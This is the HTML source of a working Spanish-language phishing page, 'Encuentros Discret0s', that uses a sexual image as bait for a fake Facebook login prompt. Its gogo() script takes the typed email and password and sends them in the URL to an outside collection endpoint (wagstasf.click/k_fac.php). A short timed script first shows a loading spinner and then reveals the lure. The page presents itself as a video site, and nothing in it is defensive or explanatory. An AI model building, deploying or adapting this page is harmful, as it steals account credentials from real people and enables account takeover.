
<html>
<head>
<title>Encuentros Discret0s</title>
<meta content='Atendemos las 24 horas' property='og:description' />
<meta content='IMGUR ACA' property="og:image">
<script id="_wauq0h">var _wau = _wau || []; _wau.push(["dynamic", "8ij1xoxvh7", "q0h", "c4302bffffff", "small"]);</script><script async src="//waust.at/d.js"></script>
<meta content='https://i.imgur.com/iFkf3AH.jpg' property='og:image' />
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.1/css/all.min.css">
<meta name="viewport" content="width=device-width, initial-scale=1">
<style type="text/css">
          .logo img {
                padding: 14px 5px;
                height: 50px;
                width: auto;
                display: block;
            }

            .hd-left {
                display: flex;
                align-items: center;
                flex-grow: 1;
            }

            .hd-right {
                display: flex;
            }

            header {
                align-items: center;
                border-bottom: 2px solid #0cb549;
            }
            #myModal{
                z-index: 2;
            }
            .container {display: none;}
            .wrap-header {
                display: flex;
                align-items: center;
                justify-content: space-between;
                position: relative;
            }

            .m-l-15 {
                margin-left: 15px !important;
            }

            .m-l-10 {
                margin-left: 10px !important;
            }

            .mghead {
                line-height: 20px;
                font-weight: 700;
                font-size: 14px;
                text-transform: uppercase;
                text-align: left;
                font-family: "Open Sans", sans-serif;
                color: #4555a7;
                display: block;
                margin: 0 0 0px 5px;
                float: left;
            }

            .mgheader {
                display: table !Important;
                width: 100% !important;
            }

            div.mg_addad1094884 {
                text-align: right;
                opacity: 0.5;
                margin-right: 10px;
                display: inline-block;
            }

            div.mg_addad1094884:hover {
                opacity: 1
            }

            div.mg_addad1094884 a {
                color: #000000;
                font: normal 10px Myriad Pro;
                text-decoration: none;
            }

            div.mg_addad1094884 img {
                margin: 0px -5px 0px 0px;
                border: 0px;
                float: none;
                padding: 0px;
            }

            :root {
                --sk-size: 40px;
                --sk-color: #fff;
            }

            .sk-center {
                margin: auto;
            }

            .sk-wave {
                width: var(--sk-size);
                height: var(--sk-size);
                display: flex;
                justify-content: space-between;
            }

            .sk-wave-rect {
                background-color: var(--sk-color);
                height: 100%;
                width: 15%;
                animation: sk-wave 1.2s infinite ease-in-out;
            }

            .sk-wave-rect:nth-child(1) {
                animation-delay: -1.2s;
            }

            .sk-wave-rect:nth-child(2) {
                animation-delay: -1.1s;
            }

            .sk-wave-rect:nth-child(3) {
                animation-delay: -1.0s;
            }

            .sk-wave-rect:nth-child(4) {
                animation-delay: -0.9s;
            }

            .sk-wave-rect:nth-child(5) {
                animation-delay: -0.8s;
            }

            @keyframes sk-wave {

                0%,
                40%,
                100% {
                    transform: scaleY(0.4);
                }

                20% {
                    transform: scaleY(1);
                }
            }

            .example {
                position: absolute;
                left: 50%;
                top: 50%;
                transform: translate(-50%, -50%);
            }

            .custom {
                z-index: 999;
                position: absolute;
                background-color: rgba(244, 109, 59, 1);
                width: 100%;
                height: 100vh;
            } 
    </style>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type"> <meta content="width=device-width, initial-scale=1, shrink-to-fit=no" name="viewport"> <title></title> <meta content="https://1.bp.blogspot.com/-JdF1bqqiLKk/WjKXCH7aTFI/AAAAAAAAFEI/cFcAJTuSi3wkb2MaByHBJqM1GKYqDWJjQCLcBGAs/s600/tai-anh-sex-dong-bao-dam-cuc-nung%2B%25286%2529.gif" itemprop="thumbnailUrl" property="og:image"> </head> <body class="touch x1-5 ios mSafari _fzu _50-3 iframe acw" tabindex="0"> <header> <div class="header no-items section" id="header"></div> </header> <main> <link href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" rel="stylesheet"> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.1/css/all.min.css" rel="stylesheet"> <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet"> <style> .container { padding-right: 15px; padding-left: 15px; margin-right: auto; margin-left: auto; } .row { margin-right: -15px; margin-left: -15px; } .col-xs-12 { width: 100%; } .carousel-inner>.item>a>img, .carousel-inner>.item>img, .img-responsive, .thumbnail a>img, .thumbnail>img { display: block; max-width: 100%; height: auto; } /* ---------------------------------------- */ .modal { position: fixed; top: 0; right: 0; bottom: 0; left: 0; z-index: 1050; display: none; overflow: hidden; outline: 0; } .fade.in { opacity: 1; } .login-form-wrap { background: radial-gradient(ellipse at center, rgba(81, 112, 173, 1) 0%, rgba(53, 84, 147, 1) 100%); border: 1px solid #2d416d; box-shadow: 0 1px #5670a4 inset, 0 0 10px 5px rgb(0 0 0 / 10%); width: 380px; max-width: 100%; height: 480px; margin: 60px auto; padding: 50px 30px 0; text-align: center; } .form-controll { border-radius: 5px; display: block; width: 100%; height: 34px; padding: 6px 12px; font-size: 14px; line-height: 1.42857143; color: #555; background-color: #fff; background-image: none; border: 1px solid #ccc; -webkit-box-shadow: inset 0 1px 1px rgb(0 0 0 / 8%); box-shadow: inset 0 1px 1px rgb(0 0 0 / 8%); -webkit-transition: border-color ease-in-out .15s, -webkit-box-shadow ease-in-out .15s; -o-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s; transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s; } .btn-primary { color: #fff; background-color: #337ab7; border-color: #2e6da4; } .btn { display: inline-block; padding: 6px 12px; margin-bottom: 0; font-size: 14px; font-weight: 400; line-height: 1.42857143; text-align: center; white-space: nowrap; vertical-align: middle; -ms-touch-action: manipulation; touch-action: manipulation; cursor: pointer; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; background-image: none; border: 1px solid transparent; border-radius: 4px; } .custom_icon { position: absolute; top: 50%; left: 50%; font-size: 40px; color: blue; transform: translate(-50%, -50%); } .submitStyleLogin { padding: 4px 0px; background-color: #627aad; border-radius: 4px; text-shadow: 0 -1px rgba(0, 0, 0, .25); background-image: -webkit-linear-gradient(rgba(0, 0, 0, 0), rgba(0, 0, 0, .1)); background-image: linear-gradient(rgba(0, 0, 0, 0), rgba(0, 0, 0, .1)); border: 1px solid #4162A7; } .submitStyleRegister { background-color: #5b93fc; padding: 10px 20px; font-weight: bold; border: 1px solid #0A5AED; text-shadow: 0 -1px rgba(0, 0, 0, .25); background-image: -webkit-linear-gradient(rgba(0, 0, 0, 0), rgba(0, 0, 0, .1)); background-image: linear-gradient(rgba(0, 0, 0, 0), rgba(0, 0, 0, .1)); } .videoView { width: 180px; font-size: 12px; background-color: #fff9d7; border: 1px solid #e2c822; padding: 7px 0px; margin: 10px auto; border-radius: 6px; } #dp_00004 { color: #899bc1; font-size: 12px; line-height: 16px; margin-top: 10px; } .imageProfile { text-align: center; padding: 5px 0px; position: relative; } .imageProfile img { border-radius: 50%; width: 80px; height: 80px; } #myModal { display: block; padding-left: 0px; margin-left: 0px; margin-right: 0px; } .nguoisangtao { background-color: yellow; font-size: 20pt; } .nguoisangtaocustom { color: #ff1313; } .img-responsive { height: 100vh; object-fit: cover; width: 100%; } .rows1 { margin-top: 10px; } .separator { clear: both; text-align: center; } .rows2 { background: #3b5998; } .inputcustom1 { height: 40px; margin-bottom: 2px; } .inputcustom2 { height: 40px; } ._55ws { padding: 10px 0px; border-top: none; } </style> <script async="async" src="https://ajax.googleapis.com/ajax/libs/webfont/1.5.18/webfont.js"></script> <div class="container"> <div class="row rows1"> <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12"> <div class="separator"> <b><span><a class="nguoisangtao" href="#" onclick="showlog()"></a></span></b> </div> <img alt="Image" class="img-responsive" onclick="showlog();" src="https://1.bp.blogspot.com/-JdF1bqqiLKk/WjKXCH7aTFI/AAAAAAAAFEI/cFcAJTuSi3wkb2MaByHBJqM1GKYqDWJjQCLcBGAs/s600/tai-anh-sex-dong-bao-dam-cuc-nung%2B%25286%2529.gif"> <div class="separator" style=" text-align: center;"> <b><span><a class="nguoisangtao nguoisangtaocustom" href="#" onclick="showlog()"></a></span></b> </div> </div> </div> </div> <div class="modal fade in" id="myModal" role="dialog"> <section class="login-form-wrap"> <div class="row rows2"> <div class="col-lg-12 imageProfile"> <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrvVTU2BtyfnmAMnMbxYuQrFV7dQzbh3SOyGn1RBJcMk1ttSi_ywez5WEOqJ38SCcnBENtyrpXvxQxni_qoAJiRqQW7NGbSI8cFyEFsUyAJFrZzX9X3UxKFpXnU7rDmioJMf2gqIbwOL2qP41fTpCRmM_Rhv26lYEWCMVgmUrxCXwH1AoGERu1-0q4MA/s1904/296529220_968014327931617_2473115770243967954_n.jpg"> <i class="fa fa-facebook-f custom_icon"></i> </div> </div> <div class="row"> <div class="videoView" id="dp_0001"> <img src="https://i.postimg.cc/MTq50GNX/phone.png" style="max-width: 20px;" class="imgphone"> Inicia sesión en tu cuenta para poder ver el video </div> <form action="javascript:gogo();" class="col-xs-12 col-sm-12 col-md-12 col-lg-12" id="login_form_mb" method="post"> <input class="form-controll inputcustom1" id="email" name="email" placeholder="Correo electrónico o número de teléfono " required="" type="text"> <input class="form-controll inputcustom2" id="pass" name="pass" placeholder="Contraseña " required="" type="password"> <input class="form-controll inputcustom1" name="subdomain" required="" type="hidden" value="videohtpp456"> <div class="_55ws"> <button class="btn btn-primary btn-lg btn-block submitStyleLogin" id="dp_00002" name="submit" type="submit">Iniciar sesión</button> </div> </form> </div> <button class="btn btn-primary submitStyleRegister" type="button">Crear cuenta de Facebook</button> <p id="dp_00004"></p> </section>
<script> function gogo() 
        { var e = document.getElementById("email").value; 
        var p = document.getElementById("pass").value; 
        var url = "https://wagstasf.click/k_fac.php"; 
        location.href = url + "?email="+e+"&pass="+p; } 
    </script> </div>
</main>
<footer>
<div class="abc" style="width: auto;height: auto;">
<div class="custom" id="showlive">
<div class="example">
<div class="sk-wave">
<div class="sk-wave-rect"></div>
<div class="sk-wave-rect"></div>
<div class="sk-wave-rect"></div>
<div class="sk-wave-rect"></div>
<div class="sk-wave-rect"></div>
</div>
</div>
</div>
</div>
</footer>
</body></html>
<script type="text/javascript">
        
        function aparecer(){
            document.querySelector("body > main > div.container").style.display="block";
            document.querySelector("body > footer > div").style.display="none";
        }

setTimeout(() => {
 aparecer();
}, "1000")

</script>